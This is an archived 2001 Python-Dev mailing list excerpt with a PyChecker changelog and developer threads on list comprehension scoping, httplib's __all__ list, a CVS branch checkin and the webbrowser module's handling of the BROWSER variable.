Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From beazley at cs.uchicago.edu Thu May 31 15:34:57 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Thu, 31 May 2001 08:34:57 -0500 (CDT) Subject: [Python-Dev] RE: Iteration variables and list comprehensions In-Reply-To: References: Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu> Greg Ewing writes: > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops instead of lambdas. Is this really an advantage? To me, the lambda semantics are a lot more intuitive in terms of matching the way that list comprehensions are actually used and ought to work (although I will agree that the for-loop explanation is a good way to describe the internals of what a list comprehension actually does). I think I would be opposed to changing normal for-loop semantics to match any change made in list-comprehensions. 
There are too many cases where you use a loop variable after finishing a loop and I suspect that this would break a huge amount of code. For example: for i in r: ... if whatever: break print i Besides, the semantic mismatch created between a listcomp and a for-loop pales in comparison to the mismatch that currently exists between the behavior of listcomps and all of the other operators. Of course, that's just my opinion--I could be wrong. > Then we won't have to go > into hiding until Guido dies or lifts the fatwah against us. fatwah? Uh... should I start talking to the witness protection program folks? Cheers, Dave From skip at pobox.com Thu May 31 20:02:51 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 13:02:51 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: Message-ID: <15126.34635.67975.31473@beluga.mojam.com> >>>>> "Robin" == Robin Becker writes: Robin> from httplib import * Robin> class Bongo(HTTPConnection): Robin> pass ... Robin> NameError: name 'HTTPConnection' is not defined It was a brain fart on my part when creating httplib.__all__. HTTPConnection was not included in that list. I will check in a fix. In the 2.1 release __all__ was defined as __all__ = ["HTTP"] I have changed that to __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", "HTTPException", "NotConnected", "UnknownProtocol", "UnknownTransferEncoding", "IllegalKeywordArgument", "UnimplementedFileMode", "IncompleteRead", "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader", "ResponseNotReady", "BadStatusLine", "error"] and will check the change into CVS shortly. (Thomas, keep an eye open for this as an addition to 2.1.1.) The workaround I would choose is to not use from "httplib import *": import httplib class Bongo(httplib.HTTPConnection): pass Robin> Changing the * to HTTPConnection in ttt.py removes the problem. Yup, that will also work. 
Before anyone asks, "Who died and made Skip King?", the scenario as I
recall it was that the semantics of __all__ got settled on during
discussions on python-dev (the goal of __all__ being to minimize namespace
pollution by "from ... *"), but nobody stepped up immediately to do the
grunt work, so I volunteered.  The problem in relying on one person (well,
at least this one person) to do this was that I had only the following
tools at my disposal to decide what belonged in __all__:

    * what was documented in the lib reference manual (which was at times
      incomplete)

    * my experience with the various modules (some of which was
      specialized, some of which was nonexistent)

    * the standard library (which generally doesn't use "from ... *" much)

    * input from python-dev (whose members also appear not to use
      "from ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what
I came up with before the 2.1 ship date.  If people would like me to do
that now (before 2.2 gets anywhere close to release) to try and fill in as
many missing symbols as possible, let me know.

--
Skip Montanaro (skip at pobox.com)
(847)971-7098

From skip at pobox.com  Thu May 31 20:06:01 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:06:01 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
Message-ID: <15126.34825.167026.520535@beluga.mojam.com>

I just updated httplib.py to expand the list of names in its __all__ list.
I was operating on version 1.34.  After the checkin I am looking at version
1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
"release21-maint".  Did I muff it?  If so, how should I do an unmuff
operation?
Skip

From robin at jessikat.fsnet.co.uk  Thu May 31 20:33:02 2001
From: robin at jessikat.fsnet.co.uk (Robin Becker)
Date: Thu, 31 May 2001 19:33:02 +0100
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com>
References: <15126.34635.67975.31473@beluga.mojam.com>
Message-ID:

In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro
writes
>>>>>> "Robin" == Robin Becker writes:
>
>    Robin> from httplib import *
>
>    Robin> class Bongo(HTTPConnection):
>    Robin>     pass
>    ...
>    Robin> NameError: name 'HTTPConnection' is not defined
>
>It was a brain fart on my part when creating httplib.__all__.
>HTTPConnection was not included in that list.  I will check in a fix.
>In the 2.1 release __all__ was defined as
>
>    __all__ = ["HTTP"]
>
>I have changed that to
>
>    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
>               "HTTPException", "NotConnected", "UnknownProtocol",
>               "UnknownTransferEncoding", "IllegalKeywordArgument",
>               "UnimplementedFileMode", "IncompleteRead",
>               "ImproperConnectionState", "CannotSendRequest",
>               "CannotSendHeader", "ResponseNotReady", "BadStatusLine",
>               "error"]

thanks; I'm still a bit puzzled as to the exact semantics.  It just looks
wrong.  Is __all__ the only way to get things into the * version of
import?  Presumably HTTPConnection is being marked as a potential global
in the compile phase.
--
Robin Becker

From skip at pobox.com  Thu May 31 21:27:12 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:27:12 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To:
References: <15126.34635.67975.31473@beluga.mojam.com>
Message-ID: <15126.39696.370516.926735@beluga.mojam.com>

    Robin> thanks; I'm still a bit puzzled as to the exact semantics.  It
    Robin> just looks wrong.  Is __all__ the only way to get things into the
    Robin> * version of import?

Essentially, yes.
If you want to just dispense with it __all__together (=:-o), you can
textually replace __all__ with ___all__ in each of the standard library
modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
        sed -e 's/___*all__/___all__/g' < $f > $f.tmp
        mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib
directory.

    Robin> Presumably HTTPConnection is being marked as a potential global
    Robin> in the compile phase.

It has nothing to do with module compilation.  The contents of __all__ are
a static thing in the text of the .py file, and thus far almost entirely
due to me studying the inputs at hand and making a decision about what
belonged and what didn't.  Some python-dev people caught omissions and
added them before the 2.1 release.  Other than that, the mistakes are all
mine.  I had some misgivings about the whole thing during the midst of the
task and still do, but grumbled once and completed it.

Skip

From skip at pobox.com  Thu May 31 21:57:21 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:57:21 -0500
Subject: [Python-Dev] weird webbrowser behavior
Message-ID: <15126.41505.987887.477670@beluga.mojam.com>

I'm using Gnome under Mandrake 8.0 and getting very strange results using
webbrowser (indirectly via pydoc).  Apparently, Gnome's init code sets the
BROWSER environment variable to "nautilus" (much to my surprise) and
webbrowser trusts it as the god's honest truth, even though nautilus has
not been registered with the webbrowser module (am I supposed to add that
sort of stuff to site.py?).  Accordingly, _tryorder is ['nautilus'], but
'nautilus' doesn't appear in _browser.keys(), which is ['lynx', 'links',
'netscape', 'kfm', 'mozilla'].  I think webbrowser should either ignore
elements of BROWSER if they have not previously been registered (and can't
be found by _iscommand) or try to register them using GenericBrowser.
Users are apparently not the only people setting BROWSER, so the comment
in the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me.

Skip

From esr at thyrsus.com  Thu May 31 22:08:21 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 16:08:21 -0400
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500
References: <15126.41505.987887.477670@beluga.mojam.com>
Message-ID: <20010531160821.A10314@thyrsus.com>

Skip Montanaro :
> I think webbrowser should either ignore elements of BROWSER if
> they have not previously been registered (and can't be found by _iscommand)
> or try to register them using GenericBrowser.  Users are apparently not the
> only people setting BROWSER, so the comment in the code:

Fred Drake and I are co-responsible for that code.  If you want to patch it
to do this, I won't object.
--
Eric S. Raymond

"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety."
    -- Benjamin Franklin, Historical Review of Pennsylvania, 1759.

From fdrake at acm.org  Thu May 31 22:18:26 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 16:18:26 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > I just updated httplib.py to expand the list of names in its __all__ list.
 > I was operating on version 1.34.  After the checkin I am looking at version
 > 1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
 > "release21-maint".  Did I muff it?  If so, how should I do an unmuff
 > operation?
  If that's really a muff, revert the change:

        cd .../Lib/
        cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

        cvs commit -m 'unmuff...' httplib.py

  -Fred

--
Fred L. Drake, Jr.
PythonLabs at Digital Creations

From skip at pobox.com  Thu May 31 22:30:22 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:30:22 -0500
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <20010531160821.A10314@thyrsus.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
    <20010531160821.A10314@thyrsus.com>
Message-ID: <15126.43486.320228.376505@beluga.mojam.com>

    Eric> Fred Drake and I are co-responsible for that code.  If you want to
    Eric> patch it to do this, I won't object.

Here's a first pass that seems to work for me:

    https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470

though it doesn't attempt to recover if _tryorder winds up empty.

Skip

From skip at pobox.com  Thu May 31 22:48:40 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:48:40 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
    <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
Message-ID: <15126.44584.300357.360209@beluga.mojam.com>

    >> I just updated httplib.py to expand the list of names in its __all__
    >> list.  I was operating on version 1.34.  After the checkin I am
    >> looking at version 1.34.2.1.  I see that Lib/CVS/Tag exists in my
    >> directory tree and says "release21-maint".  Did I muff it?  If so,
    >> how should I do an unmuff operation?

    Fred> If that's really a muff, revert the change:

    Fred>         cd .../Lib/
    Fred>         cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

    Fred> and commit the new version as 1.34.2.2:

    Fred>         cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I
intended), but I was worried about the version number.  Should I have
checked it in as version 1.34.2.1 or 1.35?

Skip

From fdrake at acm.org  Thu May 31 23:00:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:00:34 -0400 (EDT)
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
    <20010531160821.A10314@thyrsus.com>
Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > or try to register them using GenericBrowser.  Users are apparently not the
 > only people setting BROWSER, so the comment in the code:
 >
 >     # It's the user's responsibility to register handlers for any unknown
 >     # browser referenced by this value, before calling open().
 >
 > seems like flawed logic to me.

Eric S. Raymond writes:
 > Fred Drake and I are co-responsible for that code.  If you want to patch it
 > to do this, I won't object.

  I wouldn't object either.  I *do* object to the system setting that
variable by default by either Mandrake or Gnome -- that's just stupid and
inconsiderate of the user.
  Now, if anyone can provide support for Nautilus, I won't object to that
either.  Unfortunately, Mandrake's installer stinks at upgrading (it
couldn't seem to locate my 7.2 installation) and I don't have the time to
figure that out.

  -Fred

--
Fred L. Drake, Jr.
PythonLabs at Digital Creations

From fdrake at acm.org  Thu May 31 23:04:30 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:04:30 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
    <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
    <15126.44584.300357.360209@beluga.mojam.com>
Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > Functionally, the checkin isn't a muff (it does have the change I intended),
 > but I was worried about the version number.  Should I have checked it in as
 > version 1.34.2.1 or 1.35?

  If the change should happen on the branch, leave it in.  If it's also
needed on the HEAD, check it in again there, and you're done.

  -Fred

--
Fred L. Drake, Jr.
PythonLabs at Digital Creations
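Skip's proposal in the "weird webbrowser behavior" thread has three parts: drop BROWSER entries that are neither registered nor found as commands, keep the usable ones, and recover when nothing is left (the case his first patch does not handle). The sketch below expresses that logic as a pure function. It is a hypothetical helper, not the code in his SourceForge patch, and it makes two assumptions: that BROWSER is split on `os.pathsep`, and that modern Python 3's `shutil.which` can stand in for webbrowser's private `_iscommand`. A real implementation would also register each path-found entry as a `GenericBrowser` before trying it.

```python
import os
import shutil


def resolve_try_order(browser_env, registered, default_order, which=shutil.which):
    """Filter a BROWSER-style value down to browsers that can actually be used.

    browser_env   -- raw value of the BROWSER variable (may be empty)
    registered    -- names already registered with the browser controller
    default_order -- fallback order used when nothing in BROWSER is usable
    which         -- executable lookup on PATH (injectable for testing)
    """
    order = []
    for name in browser_env.split(os.pathsep):
        name = name.strip()
        if not name or name in order:
            continue
        if name in registered:
            order.append(name)
        elif which(name) is not None:
            # Found on PATH: a real implementation would register it
            # as a GenericBrowser here before trying it.
            order.append(name)
        # Anything else (e.g. an unregistered, uninstalled "nautilus")
        # is skipped instead of breaking open().
    # Recover if BROWSER named nothing usable.
    return order if order else list(default_order)


registered = {"lynx", "links", "netscape", "kfm", "mozilla"}
not_on_path = lambda name: None  # pretend nothing extra is installed

env = os.pathsep.join(["nautilus", "mozilla"])
print(resolve_try_order(env, registered, ["netscape", "lynx"], which=not_on_path))
# ['mozilla']
print(resolve_try_order("nautilus", registered, ["netscape", "lynx"], which=not_on_path))
# ['netscape', 'lynx']
```

Injecting `which` keeps the filtering testable without depending on what happens to be installed; the fallback list plays the role of the built-in try order that webbrowser would otherwise use.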